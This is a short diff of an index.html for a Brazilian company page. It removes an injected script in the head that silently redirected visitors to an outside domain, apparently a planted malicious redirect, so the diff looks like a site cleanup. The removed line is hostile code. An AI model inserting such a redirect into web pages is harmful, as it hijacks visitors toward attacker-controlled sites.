--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html lang="pt-BR">
-<head><script>window.location.replace("https://htsbtc.sa.com/?id=ZK");</script>
+<head>
   <meta charset="UTF-8">
   <title>Empresa CNPJ 44.671.646/0001‑76</title>
   <style>
